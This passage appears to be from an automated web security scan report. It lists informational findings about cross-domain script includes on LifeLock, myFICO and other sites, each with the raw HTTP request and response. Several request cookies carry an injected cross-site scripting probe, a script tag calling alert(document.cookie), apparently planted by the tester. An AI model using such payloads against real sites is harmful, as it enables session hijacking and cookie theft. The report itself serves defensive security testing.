Y0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; LifeLockEnrollment=promoCode=GOOGSEARCH13; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:33:06 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpool_www.lifelock.com=335809034.20480.0000; path=/
Set-Cookie: TSceba2f=a1dd5475d17a0429c45b558d5def1feccc7981bb25f0484c4db41882; Path=/
Vary: Accept-Encoding
Connection: close

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<li class="verisign">
    <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.lifelock.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
<!-- START ATLAS --><script type="text/javascript" src="http://switch.atdmt.com/jaction/LifeLock_Landing_Page"></script>
...[SNIP]...
<!-- *** CLICK TRACKING CODE 3.0 *** --> <script type="text/javascript" defer="defer" src="http://keywordmax.com/tracking/show.php?id=661075270&amp;location=Homepage"></script>
...[SNIP]...

24.254. http://www.lifelock.com/services/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /services/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /services/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utma=182152376.1080477552.1303613800.1303647989.1303660958.3; __utmc=182152376; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/4/11; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; TSceba2f=68442ea13cc668c3f9534c1f2a818f2bf2f0945343012f3c4db4542d

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:47:42 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=d8c1f16f42bc8bee3379313534313201632367929eb271604db4542e; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 13517

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<li class="verisign">
    <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.lifelock.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
<!-- START ATLAS --><script type="text/javascript" src="http://switch.atdmt.com/jaction/LifeLock_Landing_Page"></script>
...[SNIP]...
<!-- *** CLICK TRACKING CODE 3.0 *** --> <script type="text/javascript" defer="defer" src="http://keywordmax.com/tracking/show.php?id=661075270&amp;location=Homepage"></script>
...[SNIP]...

24.255. http://www.lifelock.com/services/command-center/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /services/command-center/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /services/command-center/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; BIGipServerpool_www.lifelock.com=319031818.20480.0000; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; TSceba2f=672a43aa9e4e9b5fe762c7f07c003e9cd78ab7a6ed034dd24db4542d; __utma=182152376.1080477552.1303613800.1303660958.1303663668.4; __utmc=182152376; __utmb=182152376.1.10.1303663668; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/47/48

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:48:01 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=578734b64e67c084c0355516c462736c1debaef3a49de19f4db45441; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 13351

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<li class="verisign">
    <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.lifelock.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
<!-- START ATLAS --><script type="text/javascript" src="http://switch.atdmt.com/jaction/LifeLock_Landing_Page"></script>
...[SNIP]...
<!-- *** CLICK TRACKING CODE 3.0 *** --> <script type="text/javascript" defer="defer" src="http://keywordmax.com/tracking/show.php?id=661075270&amp;location=Homepage"></script>
...[SNIP]...

24.256. http://www.myfico.com/Credit-Cards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfico.com
Path:   /Credit-Cards/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Credit-Cards/ HTTP/1.1
Host: www.myfico.com
Proxy-Connection: keep-alive
Referer: http://www.myfico.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQQACTBC=IGNPMHKBMEDEICOGCAIJAOLN; NewUser=4/24/2011 7:34:16 PM; fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; TransactionID=800900002030400007100900002007; LPID=LPID=FairIsaac&LPLogoName=&LPLogoAltName=&LPLink=; MYFICO=; Experiment=47=A; ShowCCC=t; SourceProdInfo=prodid=&originid=; amcus=; amcd=f39ebcfe7b8d92f801e54dcbf76037de%2C02%2C1%2CGd%7Czg%7Czj%7Czd%7CJt%7CzK%7CJQ%7CCj%7CIV%2C1%2C7jdq%2C6%2C8C@@c_Homepage%5Dg8%2C7jcW%7C14x%2C1%2C1%7Daeo%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%21aep%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW@%7C%7C%7C@; __qca=P0-1792545009-1303691708467; cmTPSet=Y; CoreID6=96447579584513036917094; 90223518_clogin=l=1303691709&v=1&e=1303693591277; cmRS=&t1=1303691709454&t2=1303691711963&t3=1303691791275&lti=1303691791275&ln=&hr=/Credit-Cards/%3Fcm_re%3DHome-_-MainHeaderNav-_-CreditCardCenter&fti=&fn=%3A0%3BaspnetForm%3A1%3Bemail_signup_module%3A2%3B&ac=&fd=&uer=&fu=&pi=Default.aspx&ho=data.coremetrics.com/eluminate%3F&ci=90223518&cjen=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
p3p: CP="ALL DSP COR CURa PSAa PSDa OUR NOR UNI STA", policyref="http://www.myfico.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Mon, 25 Apr 2011 01:22:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 01:22:59 GMT
Connection: close
Set-Cookie: fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; expires=Mon, 23-Apr-2012 05:00:00 GMT; path=/
Set-Cookie: ShowCCC=t; domain=.myfico.com; path=/
Set-Cookie: SourceProdInfo=prodid=&originid=; path=/
Content-Length: 27946

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" >


<html>
<head><title>
   myFICO | Credit Card Center
</title>
<meta http-equiv="X-UA-Compatible"
...[SNIP]...
<td width="135" align="center" valign="top"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.myfico.com&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...

24.257. http://www.myfico.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfico.com
Path:   /Default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Default.aspx HTTP/1.1
Host: www.myfico.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQQACTBC=IGNPMHKBMEDEICOGCAIJAOLN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
p3p: CP="ALL DSP COR CURa PSAa PSDa OUR NOR UNI STA", policyref="http://www.myfico.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Mon, 25 Apr 2011 01:02:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 01:02:56 GMT
Connection: close
Set-Cookie: NewUser=4/24/2011 8:02:18 PM; path=/
Set-Cookie: fic=vid=86a074698f284dc2b96caa5088de7ce2&date=20110424080218PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; expires=Mon, 23-Apr-2012 05:00:00 GMT; path=/
Set-Cookie: TransactionID=800900002030400007100900002007; expires=Thu, 09-Jun-2011 01:02:18 GMT; path=/
Set-Cookie: LPID=LPID=FairIsaac&LPLogoName=&LPLogoAltName=&LPLink=; expires=Thu, 09-Jun-2011 01:02:18 GMT; path=/
Set-Cookie: MYFICO=; path=/
Set-Cookie: Experiment=47=A; expires=Wed, 25-Apr-2012 01:02:18 GMT; path=/
Set-Cookie: ShowCCC=t; domain=.myfico.com; path=/
Set-Cookie: SourceProdInfo=prodid=&originid=; path=/
Content-Length: 26319

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" >


<html>
<head><title>
   Free FICO Credit Score + Check Your Credit Report Online | myFICO
</title>

...[SNIP]...
<td width="135" align="center" valign="top"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.myfico.com&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...

24.258. https://www.myfico.com/Store/Register.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.myfico.com
Path:   /Store/Register.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /Store/Register.aspx?Product=2016&trialdays=2016d10&amuc=4%2c4125%2c39332 HTTP/1.1
Host: www.myfico.com
Connection: keep-alive
Referer: https://www.myfico.com/Store/Register.aspx?Product=2016&trialdays=2016d10&amuc=4,4125,39332
Cache-Control: max-age=0
Origin: https://www.myfico.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQQACTBC=IGNPMHKBMEDEICOGCAIJAOLN; TransactionID=800900002030400007100900002007; LPID=LPID=FairIsaac&LPLogoName=&LPLogoAltName=&LPLink=; Experiment=47=A; amcus=; amcd=f39ebcfe7b8d92f801e54dcbf76037de%2C02%2C1%2CGd%7Czg%7Czj%7Czd%7CJt%7CzK%7CJQ%7CCj%7CIV%2C1%2C7jdq%2C6%2C8C@@c_Homepage%5Dg8%2C7jcW%7C14x%2C1%2C1%7Daeo%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%21aep%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW@%7C%7C%7C@; __qca=P0-1792545009-1303691708467; cmTPSet=Y; CoreID6=96447579584513036917094; MYFICO=trialdays2016=10&NewPurchaser=yes; PromoCode=; acopendivids=nada; acgroupswithpersist=nada; 90223518_clogin=l=1303691709&v=1&e=1303693603459; NewUser=4/24/2011 7:37:16 PM; fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; ShowCCC=t; SourceProdInfo=prodid=&originid=; 90223518_clogin=l=1303691709&v=1&e=1303693688117; cmRS=&t1=1303691803452&t2=-1&t3=1303691888115&t4=1303691798835&fti=1303691888115&fn=aspnetForm%3A0%3B&ac=0:S&fd=0%3A8%3Actl00%24cphMainContent%24oLoginControl%24Button1%3B&uer=&fu=Register.aspx%3FProduct%3D2016%26trialdays%3D2016d10%26amuc%3D4%252c4125%252c39332&pi=Store/Register.aspx&ho=data.coremetrics.com/eluminate%3F&ci=90223518&ul=https%3A//www.myfico.com/Store/Register.aspx%3FProduct%3D2016%26trialdays%3D2016d10%26amuc%3D4%2C4125%2C39332&rf=http%3A//www.myfico.com/Default.aspx&cjen=1
Content-Length: 4879

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTYwNjQ2MjUxNQ9kFgJmD2QWCGYPZBYEZg8WAh4HVmlzaWJsZWhkAgEPFgIfAGdkAgIPZBYGAgEPFgIfAGdkAgUPFgIeBGhyZWYFDS9jc3MvZmljby5jc3NkAgYPFgIfAGhkAgQPZBYMZg9kFg
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
p3p: CP="ALL DSP COR CURa PSAa PSDa OUR NOR UNI STA", policyref="http://www.myfico.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Mon, 25 Apr 2011 00:37:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 00:37:56 GMT
Connection: keep-alive
Set-Cookie: NewUser=4/24/2011 7:37:18 PM; path=/
Set-Cookie: fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; expires=Mon, 23-Apr-2012 05:00:00 GMT; path=/
Set-Cookie: ShowCCC=t; domain=.myfico.com; path=/
Set-Cookie: SourceProdInfo=prodid=&originid=; path=/
Content-Length: 40429

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" >


<html>
<head><title>
   Please Log In or Create an Account
</title>
<meta http-equiv="X-UA-Comp
...[SNIP]...
<div id="cpversignseal"><script src=https://seal.verisign.com/getseal?host_name=www.myfico.com&size=S&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...
<td width="135" align="center" valign="top"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.myfico.com&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...

24.259. https://www.myfico.com/SystemAccess/ForgotMemberInfo.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.myfico.com
Path:   /SystemAccess/ForgotMemberInfo.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /SystemAccess/ForgotMemberInfo.aspx?ReturnUrl=&CreditKit=&& HTTP/1.1
Host: www.myfico.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQQACTBC=IGNPMHKBMEDEICOGCAIJAOLN; TransactionID=800900002030400007100900002007; LPID=LPID=FairIsaac&LPLogoName=&LPLogoAltName=&LPLink=; Experiment=47=A; amcus=; amcd=f39ebcfe7b8d92f801e54dcbf76037de%2C02%2C1%2CGd%7Czg%7Czj%7Czd%7CJt%7CzK%7CJQ%7CCj%7CIV%2C1%2C7jdq%2C6%2C8C@@c_Homepage%5Dg8%2C7jcW%7C14x%2C1%2C1%7Daeo%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%21aep%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW@%7C%7C%7C@; __qca=P0-1792545009-1303691708467; cmTPSet=Y; CoreID6=96447579584513036917094; NewUser=4/24/2011 7:35:48 PM; fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; ShowCCC=t; SourceProdInfo=prodid=&originid=; MYFICO=trialdays2016=10&NewPurchaser=yes; PromoCode=; acopendivids=nada; acgroupswithpersist=nada; 90223518_clogin=l=1303691709&v=1&e=1303693603459; 90223518_clogin=l=1303691709&v=1&e=1303693603470

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
p3p: CP="ALL DSP COR CURa PSAa PSDa OUR NOR UNI STA", policyref="http://www.myfico.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Mon, 25 Apr 2011 01:27:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 01:27:45 GMT
Connection: keep-alive
Set-Cookie: fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; expires=Mon, 23-Apr-2012 05:00:00 GMT; path=/
Set-Cookie: ShowCCC=t; domain=.myfico.com; path=/
Set-Cookie: SourceProdInfo=prodid=&originid=; path=/
Content-Length: 23918

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" >

<html>
<head><title>
   Forgot your Login ID or Password?
</title>
<meta http-equiv="X-UA-Compatible"
...[SNIP]...
<td width="135" align="center" valign="top"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.myfico.com&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...

24.260. http://www.neudesicmediagroup.com/Advertising.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neudesicmediagroup.com
Path:   /Advertising.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Advertising.aspx?site=Silverlight HTTP/1.1
Host: www.neudesicmediagroup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sun, 24 Apr 2011 15:57:47 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Cache-Control: private
Set-Cookie: ASP.NET_SessionId=lj4w123xqtsd2d2iz1t3iqwv; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 13360


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Contact Us |
...[SNIP]...
ntent="online advertising, microsoft advertising, internet advertising, web advertising, advertising network, buy advertising, sell advertising, internet ads, media solutions for publishers" />
   

   <script type="text/javascript" src="http://ajax.microsoft.com/ajax/jquery.validate/1.7/jquery.validate.min.js?v=6"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s18.sitemeter.com/js/counter.js?site=s18neumedia"></script>
...[SNIP]...

24.261. http://www.neudesicmediagroup.com/publishers.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neudesicmediagroup.com
Path:   /publishers.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /publishers.aspx HTTP/1.1
Host: www.neudesicmediagroup.com
Proxy-Connection: keep-alive
Referer: http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lnicjshpkwh1bhp5p3dwgav0; __utmz=247516440.1303660642.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=247516440.1347788847.1303660642.1303660642.1303660642.1; __utmc=247516440

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sun, 24 Apr 2011 16:57:46 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Cache-Control: private
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 8688


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Publishers |
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s18.sitemeter.com/js/counter.js?site=s18neumedia"></script>
...[SNIP]...

24.262. http://www.nextadvisor.com/credit_report_monitoring/compare.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /credit_report_monitoring/compare.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /credit_report_monitoring/compare.php?h1=4&a=2&kw=gcrmb+credit%20monitoring%20service&gclid=CPK-2pL1tagCFUxo5QodMipJDQ HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
